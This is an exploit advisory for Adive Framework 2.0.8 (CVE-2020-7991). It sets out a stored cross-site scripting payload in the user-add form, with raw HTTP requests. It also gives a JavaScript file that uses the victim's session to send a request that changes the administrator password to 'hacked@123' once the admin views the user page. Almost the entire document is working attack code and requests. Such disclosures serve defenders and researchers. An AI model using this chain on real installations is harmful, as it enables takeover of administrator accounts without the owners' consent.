Adive Framework 2.0.8 Cross Site Request Forgery

`# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)  
# Exploit Author: Sarthak Saini  
# Date: 2020-01-18  
# Vendor Link : https://www.adive.es/  
# Software Link: https://github.com/ferdinandmartin/adive-php7  
# Version: 2.0.8  
# CVE:CVE-2020-7991  
# Category: Webapps  
# Tested on: windows64bit / mozila firefox   
#   
#  
|--!>  
  
|----------------------------------------------------------------------------------  
  
1) Persistent Cross-site Scripting at user add page   
  
Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting  
  
Payload:- <script>alert(1)</script>  
  
POST /admin/user/add HTTP/1.1  
Host: 192.168.2.5  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://192.168.2.5  
DNT: 1  
Connection: close  
Referer: http://192.168.2.5/admin/user/add  
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4  
Upgrade-Insecure-Requests: 1  
  
userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3  
  
  
|----------------------------------------------------------------------------------  
  
  
2) account takeover - cross side request forgery (Change Admin Password)  
  
  
Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.  
  
-> Save the payload as exp.js  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-  
function execute()  
{  
var nuri ="http://192.168.2.5/admin/config";  
xhttp = new XMLHttpRequest();  
xhttp.open("POST", nuri, true);  
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
xhttp.withCredentials = "true";  
var body = "";  
body += "\r\n\r\n";  
body +=   
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";  
xhttp.send(body);  
return true;  
}  
  
execute();  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-  
  
-> Start a server and host the exp.js. Send the exp.js file in the xss payload  
  
Payload:- <script src="http://192.168.2.5/exp.js"></script>  
  
POST /admin/user/add HTTP/1.1  
Host: 192.168.2.5  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 143  
Origin: http://192.168.2.5  
DNT: 1  
Connection: close  
Referer: http://192.168.2.5/admin/user/add  
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4  
Upgrade-Insecure-Requests: 1  
  
userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3  
  
  
-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123  
  
|-----------------------------------------EOF-----------------------------------------  
`